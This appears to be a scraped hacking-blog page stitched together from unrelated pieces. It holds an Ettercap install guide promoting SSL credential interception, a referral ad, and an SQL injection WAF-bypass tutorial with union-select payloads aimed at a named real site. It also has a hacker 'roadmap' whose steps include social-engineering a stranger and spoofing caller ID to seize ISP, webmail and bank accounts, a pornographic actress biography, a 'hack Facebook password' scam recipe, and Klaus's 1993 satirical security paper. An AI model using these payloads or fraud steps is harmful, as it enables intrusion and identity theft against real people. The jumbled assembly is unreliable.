Ettercap is by far one of the most powerful Security Tools to perform Communication Interception on both Local and Wireless Networks.
A few days ago, Version 0.7.5 was released, introducing three new and exciting features:
1. SSL Password Interception. Captures user credentials from secure web portals such as Facebook, Yahoo, Hotmail and Gmail. This technique is based on the "Sslstrip" tool.
2. IPv6 Support. With this feature, we can now perform security tests over this network generation, giving us new and exciting Ethical Hacking opportunities.
3. NBNS Spoofing. Steals the identitiy of any network device or service, as long as it is based on Netbios name resolution. This attack is very useful on Windows Networks and Samba servers. It can also be used to attack other technologies such as SAN and NAS.
As Security Experts, we need to stay at the cutting edge of our field, testing new attack tools and their capabilities as soon as they become available.
Unfortunately, Ettercap's installation procedure is very poorly documented. Despite my amazing Google Powers, I have not found any useful Internet tutorial. To make things worse, even the great BackTrack distribution does not include the new version.
Furthermore, I really doubt we'll see the new version on Ubuntu's software repositories any time soon. Ettercap authors strongly recommend using "development" libraries, which are considered "unstable" for most production environments.
To solve the conundrum, I decided to write this tutorial, explaining a detailed installation procedure for Ettercap on Ubuntu 12.04. Of course, a rookie Hacker might say "I'll just install it on Windows! Problem solved!".
Well, if you are one of these rookies, I have bad news for you. Installing it on Windows is extremely easy. However, this platform does not support the new SSL attack!
So, with this Tutorial, I'm going to help you become one of the first Ethical Hackers in the whole Universe with the knowledge and power to use the new Ettercap awesome features.
INSTALLATION PROCEDURE
1. Installing Dependencies. Ettercap requires a lot of software libraries not usually available on a standard Ubuntu system. To install them, just open a terminal and run the following commands:
apt-get install -y cmake cmake-curses-gui
apt-get install -y libgtk2.0-dev libnet1-dev flex build-essential
apt-get install -y linux-headers-`uname -r` libpcre3-dev libpcap0.8-dev openssl
apt-get install -y libssl-dev ncurses-bin libncurses5-dev libnet6-1.3-dev libpthread-stubs0-dev
apt-get install -y zlib1g-dev libltdl-dev pango-graphite pkg-config libpango1.0-dev
apt-get install -y libatk1.0-dev libgtk2.0-dev autoconf byacc
(To accelerate the installation, open this tutorial in your browser and just copy-paste the instructions on your terminal, instead of entering them manually).
2. Sslstrip support. This new feature requires a recent libcurl library version, not yet available in Ubuntu's repositories. So, we need to install it from source. Run the following commands:
cd /usr/src
wget http://curl.haxx.se/download/curl-7.28.0.tar.gz
tar xvfz curl-7.28.0.tar.gz
cd curl-7.28.0
./configure
make
make install
In this tutorial, I'm using /usr/src as destination folder, feel free to use whatever you want.
To make sure Ettercap finds the new library, open the /etc/ld.so.conf file. Add /usr/local/lib at the end. Save the file and run ldconfig to complete the installation.
2. IPv6 Support. This new feature requires a recent libnet library version, not yet available in Ubuntu's repositories. Again, we are going to install it from source. Go to http://sourceforge.net/projects/libnet-dev/ and download the libnet-1.1.6.tar.gz file to any folder. In this tutorial, I'm using /usr/src
Run the following commands from your terminal:
cd /usr/src
tar xvfz libnet-1.1.6.tar.gz
cd libnet-1.1.6
./configure
make
make install
ldconfig
3. Ettercap Installation. Open http://sourceforge.net/projects/ettercap in your browser. Download ettercap-0-7.5.tar.gz to any folder.
In this tutorial, I use /hack/network/mitm (I install all my "Man in The Middle" attack tools in this folder, hence the name. Of course, you can choose any other folder).
Run the following commands in your terminal:
cd /hack/network/mitm
tar xvfz ettercap-0.7.5.tar.gz
cd ettercap-0.7.5
mkdir build
cd build
cmake ..
ccmake ..
You'll see the following screen:

Change the following fields, with the indicated values:
ENABLE_IPV6 ON
FOUND_LIBCURL /usr/local/lib/libcurl.so
HAVE_LIBNET /usr/local/lib/libnet.so
Press Enter after modifying each field, press "c" to return to configuration mode, and finally "g" to save the changes and exit. Finish Ettercap's installation by running the following commands:
make
make install
SSLSTRIP CONFIGURATION
1. Sslstrip capability requires root privileges to make some temporal changes to the local firewall. To grant them, open Ettercap's configuration file /etc/ettercap/etter.conf. Modify the text at line 17, so it reads ec_uid = 0.

2. Delete the # comment character from lines 171 and 172. These are firewall modifications required by Sslstrip, used only while Ettercap is running. Don't worry, they are just network traffic redirection instructions and do not jeopardize your firewall integrity in any way.

Save the etter.conf file.
ETTERCAP TESTING
Run the following command:
ettercap -G
If everything works as expected, you'll see the following screen:

Congratulations! You are now one of the first and proud Ethical Hackers in the whole Universe to test the new and powerful Ettercap!
Now go have a drink... You know you deserve it.

Itz COST Free but not EFFORT Free ;)
Now u can get your free domain name at
www.freedomainfactory.com
OR
www.freepremiumdomain.com

All u have to do is Sign Up....invite your friends thru your referal link and complete surveys to earn points..DATZ IT!!

Common Problem
(Still No Error in order by 10000--)

First thing you do when a website is vulnerable to SQL injection is to check
the number of columns inside the database.
Already tried to put 10000 columns test but still got no errors?
Having problems knowing the number of columns inside the database?
The reason is it is blocked by the WAF, but here is a method to bypass it.

Example Vuln:
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10'

Example:
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10+order+by+10000--

If there is no error with that number of columns, it will be impossible for a small site like this. :)
To bypass this, you have to add ' after parameter id and also put + at the end.

So you will have something like this.. :)
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10%27+order+by+10000--+

NOTE
YOU STILL HAVE TO CONTINUE USING THE ' AND + AS YOU CONTINUE LIKE THIS.
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10' union select 1,2,3,4,5,6,7,8,9,10,11,12--+

HOPE YOU ENJOY THE TUTORIAL!

How to Become a Hacker:

1. Learn TCP/IP, Basic

Information gathering,

Proxies, Socks, SSL, VPN, VPS,
RDP, FTP, POP3, SMTP, Telnet,
SSH. 2. Learn Linux, Unix, Windows
- You can do this using
vmware or any virtual
desktop utility. 3. Learn a programming
language that's compatible
with all OS - Perl, Python, C . 4. Learn HTML, PHP, Javascript,
ASP, XML, SQL, XSS, SQLI, RFI,
LFI 5. Learn Reverse engineering
and crack some programs for
serials easy ones like mirc,
winzip, winrar or old games. 6. Code a fuzzer for common
protocols - ftp, pop3, 80, 8080 -
Pick some free software like
ftp server, mail server, apache
or iis webserver or a
webserver all-in-one pack, or teamspeak, ventrilo, mumble. 7. Code a tool that uses grep to
sort out unique code in source
codes. 8. Make a custom IPtable, IPsec
firewall that blocks all
incoming traffic and out going
traffic and add filters to accept
certain ports that your
software or scripts use. 9. Pick a kernel in linux or
unix, also pick a Microsoft OS
version lets say Winxp pro sp2
put them on the virtual
desktops (vmware) and find
and code a new local exploit in those versions, then install a
Apache webserver on the
Linux/Unix and a IIS
webserver on the winxp pro
and attempt to find and code a
new local reverse_tcp_shell exploit. 10. Learn Cisco Router and
Switch configuration and
setup. 11. Learn Checkpoint Setup and
Config 12. Learn Wifi scanning,
cracking, sniffing. 13. Pick a person in you
phonebook for the area code
you live in or city then ring
the person on a anonymous
line like skype or a payphone
or a carded sim and attempt to social engineer the person for
his name, address, data of
birth, city born, country born,
ISP connected with, Phone
company connected with,
What bank he/she uses and anything else you can get.
Then Attempt to ring using a
spoof caller ID software with
the person's phone number -
call the ISP and try reset the
password to his/her internet connection/ webmail, get
access to bank account or ask
them to send out a new *** to
a new address (drop) with a
new pin, reset of phone
company passwords. 14. Use your information
gathering skills to get all the
information off a website like
a shop then use the spoof
callerID software or hack your
phone to show a new number of the Webserver's Tech
Support number then ring the
shop owner and try get the
shop site password. 15. Do the same thing but
attempt to use a web attack
against a site or shop to gain
admin access. 16. Once got access upload a
shell and attempt to exploit
the server to gain root using a
exploit you coded not
someone else s exploit. 17. Make your own Linux
Distro 18. Use your own Linux Distro
or use a vanilla Linux gnome
(not kde) keep it with not
much graphics so you can learn
how to depend on the
terminal and start from scratch install applications that you
will only need for a blackbox
(Security test box), make
folders for fuzzers, exploits,
scanners..etc Then load them
up with your own scripts and other tools ( By this stage you
shouldn't need to depend on
other peoples scripts). 19. Learn macosx and attempt
to gain access to a Macosx box
whether it be your own or
someones else s. 20. Create a secure home
network and secure your own
systems with your own
Security policies and firewall
settings. All this isn't a over night
learning it will take a nice 3 - 4
years to learn a bit of this 5+
years to learn most of it and
even then you may need time
to keep learn as IT keeps changing everyday.

Aletta Ocean (born December 14, 1987) is a Hungarian pornographic actress.^[1] Ocean began modeling in 2006 after winning a beauty contest. She started pornography in 2007, taking the plunge timidly at first, pushed into it by her boyfriend at the time. Six months later, she had decided to make a job of it. She quit her studies as the news of her professional activity on the side had become known. In 2009 she also spent five months shooting in the USA. She received a nomination in the 11th Hot d'Or, the French pornographic awards, in the category of Best European Starlet.
She has modeled for the likes of Penthouse and Hungarian Playboy. She won the 2010 AVN Awards for Female Foreign Performer of the Year and Best Sex Scene in a Foreign-Shot Production (Dolls House).^[2] Ocean has appeared in nearly 180 pornographic films.^[3]

hack facebook PAssWOrd In EASy STepS:

1)use google

2)typr http://www.hackfacebookpassword.com/

3)type the complete address  of the person whose id you want to be hacked

4)NOw CLiCL\k on REtrieVe paSSword

5)unlock premium account and access the password

        A Guide to Internet Security: Becoming an Uebercracker
        and Becoming an UeberAdmin to stop Uebercrackers.


Author: Christopher Klaus <cklaus@shadow.net>
Date: December 5th, 1993.
Version: 1.1

  This is a paper will be broken into two parts, one showing 15 easy steps
to becoming a uebercracker and the next part showing how to become a
ueberadmin and how to stop a uebercracker.  A uebercracker is a term phrased
by Dan Farmer to refer to some elite (cr/h)acker that is practically
impossible to keep out of the networks.

Here's the steps to becoming a uebercracker.

Step 1. Relax and remain calm. Remember YOU are a Uebercracker.

Step 2. If you know a little Unix, you are way ahead of the crowd and skip
past step 3.

Step 3. You may want to buy Unix manual or book to let you know what
ls,cd,cat does.

Step 4. Read Usenet for the following groups: alt.irc, alt.security,
comp.security.unix.  Subscribe to Phrack@well.sf.ca.us to get a background
in uebercracker culture.

Step 5. Ask on alt.irc how to get and compile the latest IRC client and
connect to IRC.

Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way
there!)

Step 7. Now, sit on #hack and send messages to everyone in the channel
saying "Hi, Whats up?". Be obnoxious to anyone else that joins and asks
questions like "Why cant I join #warez?"

Step 8. (Important Step) Send private messages to everyone asking for new
bugs or holes. Here's a good pointer, look around your system for binary
programs suid root (look in Unix manual from step 3 if confused). After
finding a suid root binary, (ie. su, chfn, syslog), tell people you have a
new bug in that program and you wrote a script for it.  If they ask how it
works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask
them to trade for their get-root scripts.

Step 9. Make them send you some scripts before you send some garbage file
(ie. a big core file). Tell them it is encrypted or it was messed up and
you need to upload your script again.

Step 10. Spend a week grabbing all the scripts you can. (Dont forget to be
obnoxious on #hack otherwise people will look down on you and not give you
anything.)

Step 11. Hopefully you will now have atleast one or two scripts that get
you root on most Unixes. Grab root on your local machines, read your
admin's mail, or even other user's mail, even rm log files and whatever
temps you. (look in Unix manual from step 3 if confused).

Step 12. A good test for true uebercrackerness is to be able to fake mail.
Ask other uebercrackers how to fake mail (because they have had to pass the
same test). Email your admin how "layme" he is and how you got root and how
you erased his files, and have it appear coming from satan@evil.com.

Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag
about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are
a uebercracker.)

Step 14. Wait a few months and have all your notes, etc ready in your room
for when the FBI, Secret Service, and other law enforcement agencies
confinscate your equipment. Call eff.org to complain how you were innocent
and how you accidently gotten someone else's account and only looked
because you were curious. (Whatever else that may help, throw at them.)

Step 15. Now for the true final supreme eliteness of all uebercrackers, you
go back to #hack and brag about how you were busted.  YOU are finally a
true Uebercracker.


Now the next part of the paper is top secret.  Please only pass to trusted
administrators and friends and even some trusted mailing lists, Usenet
groups, etc. (Make sure no one who is NOT in the inner circle of security
gets this.)

This is broken down on How to Become an UeberAdmin (otherwise know as a
security expert) and How to stop Uebercrackers.

Step 1. Read Unix manual ( a good idea for admins ).

Step 2. Very Important.  chmod 700 rdist; chmod 644 /etc/utmp. Install
sendmail 8.6.4.  You have probably stopped 60 percent of all Uebercrackers
now.  Rdist scripts is among the favorites for getting root by
uebercrackers.

Step 3. Okay, maybe you want to actually secure your machine from the
elite Uebercrackers who can break into any site on Internet. 

Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing
packets. (This only applies to advanced admins who have control of the
router, but this will stop 90% of all uebercrackers from attempting your
site.)

Step 5. Apply all CERT and vendor patches to all of your machines. You have
just now killed 95% of all uebercrackers.

Step 6. Run a good password cracker to find open accounts and close them.
Run tripwire after making sure your binaries are untouched. Run tcp_wrapper
to find if a uebercracker is knocking on your machines.  Run ISS to make
sure that all your machines are reasonably secure as far as remote
configuration (ie. your NFS exports and anon FTP site.)

Step 7. If you have done all of the following, you will have stopped 99%
of all uebercrackers. Congrads! (Remember, You are the admin.) 

Step 8. Now there is one percent of uebercrackers that have gained
knowledge from reading some security expert's mail (probably gained access
to his mail via NFS exports or the guest account.  You know how it is, like
the mechanic that always has a broken car, or the plumber that has the
broken sink, the security expert usually has an open machine.) 

Step 9. Here is the hard part is to try to convince these security experts
that they are not so above the average citizen and that by now giving out
their unknown (except for the uebercrackers) security bugs, it would be a
service to Internet.  They do not have to post it on Usenet, but share
among many other trusted people and hopefully fixes will come about and
new pressure will be applied to vendors to come out with patches.

Step 10.  If you have gained the confidence of enough security experts,
you will know be a looked upto as an elite security administrator that is
able to stop most uebercrackers.  The final true test for being a ueberadmin
is to compile a IRC client, go onto #hack and log all the bragging and
help catch the uebercrackers. If a uebercracker does get into your system,
and he has used a new method you have never seen, you can probably tell
your other security admins and get half of the replies like - "That bug
been known for years, there just isn't any patches for it yet. Here's my
fix." and the other half of the replies will be like - "Wow.  That is very
impressive. You have just moved up a big notch in my security circle."
VERY IMPORTANT HERE:  If you see anyone in Usenet's security newsgroups
mention anything about that security hole, Flame him for discussing it
since it could bring down Internet and all Uebercrackers will now have it
and the million other reasons to keep everything secret about security.


Well, this paper has shown the finer details of security on Internet. It has
shown both sides of the coin.  Three points I would like to make that would
probably clean up most of the security problems on Internet are as the
following:

1.  Vendors need to make security a little higher than zero in priority.
If most vendors shipped their Unixes already secure with most known bugs
that have been floating around since the Internet Worm (6 years ago) fixed
and patched, then most uebercrackers would be stuck as new machines get
added to Internet.  (I believe Uebercracker is german for "lame copy-cat
that can get root with 3 year old bugs.") An interesting note is that
if you probably check the mail alias for "security@vendor.com", you will
find it points to /dev/null.  Maybe with enough mail, it will overfill
/dev/null.  (Look in manual if confused.)

2.  Security experts giving up the attitude that they are above the normal
Internet user and try to give out information that could lead to pressure
by other admins to vendors to come out with fixes and patches.  Most
security experts probably don't realize how far their information has
already  spread.

3.  And probably one of the more important points is just following the
steps I have outlined for Stopping a Uebercracker.


Resources for Security:
   Many security advisories are available from anonymous ftp cert.org.
Ask archie to find tcp_wrapper, security programs.  For more information
about ISS (Internet Security Scanner), email cklaus@shadow.net.


Acknowledgements: 

   Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott
Miles, Scott Yelich, and Henri De Valois.


Copyright:

This paper is Copyright 1993, 1994.  Please distribute to only trusted
people.  If you modify, alter, disassemble, reassemble, re-engineer or have
any suggestions or comments, please send them to:

cklaus@shadow.net